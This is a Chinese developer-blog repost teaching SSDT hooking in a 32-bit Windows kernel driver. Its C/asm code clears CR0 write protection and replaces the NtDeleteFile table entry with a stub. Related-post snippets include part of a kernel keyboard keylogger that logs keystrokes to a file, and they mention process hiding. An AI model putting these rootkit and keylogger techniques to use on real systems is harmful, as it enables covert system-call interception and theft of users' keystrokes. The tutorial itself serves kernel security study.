内核驱动开发HOOK SSDT

最新推荐文章于 2023-05-06 17:43:34 发布
转载 最新推荐文章于 2023-05-06 17:43:34 发布 · 218 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/ciangcic/p/3528230.html
文章标签:

#驱动开发

本文详细介绍了HOOKSSDT技术的工作原理及其实现过程。通过修改KeServiceDescriptorTable中的函数指针来实现HOOK操作,并在驱动卸载时恢复原有函数指针。文章提供了具体的代码示例,包括HOOK函数、UNHOOK函数及自定义函数。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

HOOK SSDT思路:

驱动加载时通过KeServiceDescriptorTable得到函数指针地址 -> 替换其地址为自定义函数地址

驱动卸载时恢复SSDT原来地址

代码部分:

对于KeServiceDescriptorTable的类型定义如下:

typedef struct _SERVICE_DESCRIPTOR_TABLE

{

PULONG ServiceTableBase; //指向系统服务函数地址表

PULONG ServiceCounterTableBase; 

ULONG NumberOfService; //服务函数的个数,NumberOfService*4 就是整个地址表的大小

ULONG ParamTableBase;

}SERVICE_DESCRIPTOR_TABLE,*PSERVICE_DESCRIPTOR_TABLE;

//KeServiceDescriptorTable为导出函数

 

extern "C" PSERVICE_DESCRIPTOR_TABLE KeServiceDescriptorTable;

驱动入口函数:

extern "C" NTSTATUS DriverEntry ( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING pRegistryPath ) 

{
NTSTATUS status; //定义驱动卸载函数  pDriverObject->DriverUnload = OnUnload; //调用HOOK Hook();
return STATUS_SUCCESS;

}

驱动卸载函数:

VOID OnUnload(IN PDRIVER_OBJECT pDriverObject) 

{

//调用恢复HOOK

Unhook();

}

HOOK函数:

VOID Hook()

{

  //得到内核函数在SSDT表中索引的地址,其中0x3E是服务ID号

  ULONG NtDeleteFileAddress = (ULONG)(KeServiceDescriptorTable->ServiceTableBase+0x3E);

  //在SSDT表中取到内核函数的地址,并保存以便卸载驱动的时候恢复

  OldNtDeleteFile = *(ULONG*)NtDeleteFileAddress ;

  __asm

  {

    //去掉内存保护

    cli mov eax,cr0

    and eax,not 10000h

    mov cr0,eax

  }

  //把我们自己函数写进SSDT表中索引位置 

  *(ULONG*)NtDeleteFileAddress = (ULONG)MyNtDeleteFile;

  __asm

  {

    //恢复内存保护 mov eax,cr0 or eax,10000h mov cr0,eax sti

  }

}

UNHOOK函数:

VOID Unhook()

{

   //得到内核函数在SSDT表中索引的地址

  ULONG NtDeleteFileAddress = (ULONG)(KeServiceDescriptorTable->ServiceTableBase+0x3E);

  __asm

  {

     cli mov eax,cr0

    and eax,not 10000h

    mov cr0,eax

   }

  //在SSDT表中索引的地址恢复系统内核函数

  *(ULONG*)NtDeleteFileAddress = (ULONG)OldNtDeleteFile;

  __asm{ mov eax,cr0 or eax,10000h mov cr0,eax sti }

}

//自定义函数

NTSTATUS MyNtDeleteFile( IN POBJECT_ATTRIBUTES ObjectAttributes)

{

  //函数内可做过滤,如放行则可调用原来函数

  return STATUS_SUCCESS;

}

 

转载于:https://www.cnblogs.com/ciangcic/p/3528230.html

hook驱动方式注入内核源代码
01-19
C语言写的ROOT记录器,编译通过了.#include "stdafx.h" #include "ScanCode.h" #include "DriverEntry.h" #include <stdarg.h> const WCHAR *DEVICE_NAME = L"\\Device\\MonkeyKingDeviceName"; const WCHAR *SYMOBL_NAME = L"\\??\\MonkeyKingSymbolicName"; const char *NT_DEVICE_NAME = "\\Device\\KeyboardClass0"; const char *LOG_FILE_NAME = "\\DosDevices\\c:\\MonkeyKing.txt"; int numPendingIrps = 0; /*---------------------------------------------------------------------------------------------------------------------------------------------*/ /************************************************************************ * 函数名称:DriverEntry * 功能描述:初始化驱动程序,定位和申请硬件资源,创建内核对象 * 参数列表: pDriverObject:从I/O管理器中传进来的驱动对象 pRegistryPath:驱动程序在注册表的中的路径 * 返回 值:返回初始化驱动状态 *************************************************************************/ STDAPI_(NTSTATUS) DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING pRegistryPath ) { NTSTATUS retValue = STATUS_SUCCESS; TRACEMSG("初始化例程..."); pDriverObject->DriverUnload = OnUnload; for (INT32 i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++){ pDriverObject->MajorFunction[i] = DispatchHandler; } pDriverObject->MajorFunction[IRP_MJ_READ] = DispatchRead; TRACEMSG("初始化例程...完成"); //创建设备。 TRACEMSG("创建设备..."); PDEVICE_OBJECT pKeyboardDevice = NULL; if (!NT_SUCCESS(retValue = CreateDevice(pDriverObject, &pKeyboardDevice))) { TRACEMSG("创建设备...失败"); return retValue; } TRACEMSG("创建设备...完成。键盘设备对象指针为:0x%x", pKeyboardDevice); //挂接设备。 TRACEMSG("挂接设备..."); if (!NT_SUCCESS(retValue = HookKeyboard(pKeyboardDevice))) { TRACEMSG("挂接设备...失败"); return retValue; } TRACEMSG("挂接设备...完成"); TRACEMSG("初始化线程..."); if (!NT_SUCCESS(retValue = InitThreadLogger(pDriverObject))) { TRACEMSG("初始化线程...失败"); return retValue; } TRACEMSG("初始化线程...完成");
WIN64位驱动 InLine_HOOK框架
12-28
Win64 和 Win32 都可用的内核 InLineHook 框架,网上找的感觉都很麻烦, 这个感觉比较清晰明了, 但也有不足之处 就是修改函数头部时 不够完美;但是日常使用感觉足够了.
Delphi实现SSDT Hook
weixin_34019144的博客
01-08 258
关于SSDT Hook的理论知识就不多说了。简单的说一下Delphi开发KMD的一些需要注意的地方... 这里使用DDDK---有点自己修改过的痕迹不过区别不大...自己可以看代码1.KeServiceDescriptorTable是一个很特殊的函数...如果直接使用implib来进行创建库的话你会发现这个函数是被忽略的...因为偏移为0所以这个函数基本上只能起到标志作用没有任何实用价值.......
SSDT Hook For Delphi
05-15 997
 者: Anskya关于SSDT Hook的理论知识就不多说了。简单的说一下Delphi开发KMD的一些需要注意的地方...这里使用DDDK---有点自己修改过的痕迹不过区别不大...自己可以看代码1.KeServiceDescriptorTable是一个很特殊的函数...如果直接使用implib来进行创建库的话你会发现这个函数是被忽略的...因为偏移为0所以这个函数基本上只能起到标志作用没有任何
java 内核驱动_内核驱动 - HOOK SSDT
weixin_35600369的博客
02-27 164
1 //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////2 //3 //驱动编程: HOOK SSDT4 //5 ///////////////////////////////////////////////...
Hook ssdt.rar_HookSSDT_hook_ssdt_进程保护_驱动保护
09-25
在信息安全领域,Hook SSDT(System Service Dispatch Table)是一种常见的技术手段,它涉及到操作系统内核驱动程序以及进程管理等多个核心概念。Hook SSDT允许开发者在系统服务调用之前或之后插入自定义代码,以...
SSDT Hook_内核_x86_ssdthook_驱动_
10-03
这通常需要管理员权限,并通过DriverEntry等内核驱动接口完成。 6. 恢复SSDT:当不再需要Hook时,将备份的原始服务函数指针恢复到SSDT中,解除Hook。 在32位系统中,由于寻址空间限制,处理SSDT Hook时需要特别...
所有种类的钩子,用户层的API HOOK,内核驱动层的SSDT-hook,IDT-hook,sysenter-hook.zip
01-27
本压缩包包含的资源涉及了用户层API Hook内核驱动层的SSDT(System Service Dispatch Table)Hook、IDT(Interrupt Descriptor Table)Hook以及sysenter Hook,这些都是Windows操作系统中实现系统级控制的关键技术...
SSDT.rar_hook 驱动_ssdt_ssdt hook
09-22
SSDT.rar_hook 驱动是针对系统服务描述表(System Service Dispatch Table, SSDT)进行操作的一个技术,主要用于在Windows操作系统中实现钩子(hook)功能。SSDT是操作系统核心与用户模式应用程序之间交互的重要桥梁...
SSDTHook_ssdt_SSDTHook_
10-01
SSDT Hooking是一种高级的逆向工程和调试技术,主要用于监控或篡改系统调用,通常在开发恶意软件或安全研究中被使用。 标题“SSDTHook_ssdt_SSDTHook_”暗示了这个压缩包可能包含了一个关于SSDT Hooking的工具或者...
驱动hookapi
04-19
可以hook 任意函数 ,采用内联hook
驱动开发学习hook包全集(ddk+driverm+debugview+hook
07-21
DriverMonitor_驱动开发学习hook 一个例子用来说明驱动开发 以及在驱动里如何写文件读文件 可以调用c库函数 以及如何实现驱动级别的hook 核心是关闭中断 解析dll中的pe的文件格式 并修改 sys中全局变量的引用
64位驱动SSDTHOOK教程
10-02
完整的64位驱动SSDTHOOK文档资料,学习win7 64位驱动很好的
SSTD HOOK
qq_50242229的博客
05-06 222
打开一个记事本,只能通过点击关闭按钮或者菜单退出可以,而不能通过其他程序调用TerminateProcess关闭它。首先我们得找到TerminateProcess真正调用的内核函数的函数编号(所以我们需要修改编号101H的函数的地址,更新为我们自己的函数地址0x101但是,我们去修改该地址的值,有可能修改失败,页有可能是只读的,所以我们可以去修改该地址的PDPTE\PDE\PTE的属性,或者可以直接修改CR0寄存器的WP位。
驱动函数的hook
qq_41071646的博客
11-13 1213
其实 驱动hook也就仅限于32位 64位有保护 类似 pg什么的 现在听大佬们讲驱动hook都已经过时了(感觉对于我这种萌新还是有参考价值的) 讲hook前 需要了解其实windows驱动编程就可以说是windows内核编程 内核除了看似很简单的错误  毕竟轻的后果就是蓝屏  后续还会出现各种各样的错误(这就体现了虚拟机和快照的好处) 然后 windows为了内核的安全 就规定很多不可写的内...
驱动开发内核层InlineHook挂钩函数
热门推荐
优快云
10-31 1万+
在上一章中,LyShark教大家如何通过LDE64引擎实现计算反汇编指令长度,本章将在此基础之上实现内联函数挂钩,内核中的InlineHook函数挂钩其实与应用层一致,都是使用劫持执行流并跳转到我们自己的函数上来做处理,唯一的不同的是内核Hook只针对内核API函数,但由于其身处在最底层所以一旦被挂钩其整个应用层都将会受到影响,这就直接决定了在内核层挂钩的效果是应用层无法比拟的,对于安全从业者来说学会使用内核挂钩也是很重要。挂钩的原理可以总结为,通过得到原函数地址,然后保存该函数的前15。
驱动Hook ZwTerminateProcess(mdl方式)
qq1134993111的专栏
09-21 1843
http://www.cnblogs.com/zhujian198/archive/2010/08/16/1800760.html #include "ntddk.h" typedef struct _SERVICE_DESCRIPTOR_TABLE {     PULONG ServiceTableBase;     PULONG ServiceCounterTab
进程隐藏与进程保护(SSDT HOOK 实现)
lei35151的专栏
11-04 1420
进程隐藏与进程保护(SSDT HOOK 实现) http://www.cnblogs.com/BoyXiao/archive/2011/09/04/2166596.html 代码注入之远程线程篇 http://www.cnblogs.com/BoyXiao/archive/2011/08/11/2134367.html#2786089
Windows内核函数ZwSetValueKey的SSDT Hook方法
【压缩包子文件的文件名称列表】中提到的hookZwSetValueKey是本次实现hook的程序文件名,可能包含了编写的内核驱动代码,这些代码通过WDK工具编译和加载,最终实现对ZwSetValueKey函数的hook操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值